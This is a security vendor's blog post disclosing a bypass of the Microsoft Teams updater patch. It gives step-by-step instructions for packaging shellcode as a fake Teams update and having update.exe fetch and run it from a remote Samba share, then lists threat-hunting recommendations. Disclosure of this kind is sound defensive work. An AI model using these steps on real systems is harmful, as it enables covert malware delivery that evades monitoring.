Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Microsoft Teams Updater Living off the Land

Introduction

During this global pandemic COVID-19 situation, there has been an increasing trend of video conferencing solutions, Trustwave SpiderLabs are exercising extra vigilance in monitoring the video conferencing traffics. During our threat hunt, we have observed lots of Microsoft Teams updater traffic. Due to the noisy nature of the traffic, there is a possibility that malicious traffic hiding there will evade the analyst's view or even be added to a list of allowed, and therefore unmonitored, list of applications.

Because of this, I reviewed the previous findings on Microsoft Team code execution and found that it was fixed but not completely.

Observations

My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wish. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string "http/s", ":", "/" and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log

 

Patch

 

It allows share access in the local UNC format: \\server\

To exploit this an attacker would need to:

  1. Get the file inside the network in an open shared folders
  2. Access the payload from that share to the victim machine

It looks like a complicated scenario and there’s a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command execution, downloaded remote payload, and executed directly from Microsoft Teams Updater "Update.exe"

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint

%localappdata%/Microsoft/Teams/update.exe

Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first

Payload creation:

  1. Extract any nupkg package, in my example, Teams-1.3.00.27559-full.nupkg
    1. goto %localappdata%/Microsoft/Teams/packages to pick Microsoft Teams pre-built package
  2. Go to Teams-1.3.00.27559-full\lib\net45 and drop your shellcode as 'squirrel.exe' compress the complete folder as 'Teams-1.3.00.27559-full.nupkg'
  3. Calculate the metadata with the command:
    sha1sum Teams-1.3.00.27559-full.nupkg && wc -c < Teams-1.3.00.27559-full.nupkg

    resulting with the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams-1.3.00.27559-full.nupkg 4695

  4. Create a file named RELEASES and copy the above output and save.
  5. The result will be a main directory containing two files: Teams-1.3.00.27559-full.nupkg and RELEASES.
  6. upload those two files to remote Samba server:

           

Payload

Requirement:

Since it is a Samba server, the server needs to be first authenticated from windows "Run".

Steps to Reproduce:

  1. Go to target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the below command:
    update.exe --update=[Samba server contains the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After some seconds (wait for 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:

Process_flow

Proof of concept:

Impact:

  • Microsoft Teams Update.exe binary would act as LOLbin (Living off the Land binaries)
  • Since the installation is in the local user Appdata folder, no privileged access is needed
  • Attackers can use this to masquerade the traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection)."

Trustwave Recommendations

From the Threat hunting perspective

  1. Utilize the EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the size of the file, you can use that to differentiate trojan squirrels from the legit squirrel.exe
    • If you are dealing with Microsoft Teams “update.exe”, Validate the size and hash, hunt for any anomalies
  3. Investigate outgoing SMB connections especially from the Microsoft Teams updater update.exe or filter SMB connections entirely at the perimeter if unnecessary
  4. Request customer or IT for any security exclusions placed for Microsoft Teams packages and review the change applied
  5. IT should install the Microsoft Teams under the "Program Files" folder, so an attacker cannot drop and execute the remote payload; this can be carried out by Group policy
  6. Disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.

Latest SpiderLabs Blogs

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising

During an Advanced Continual Threat Hunt (ACTH) investigation that took place in early December 2023, Trustwave SpiderLabs discovered Ov3r_Stealer, an infostealer distributed using Facebook...

Read More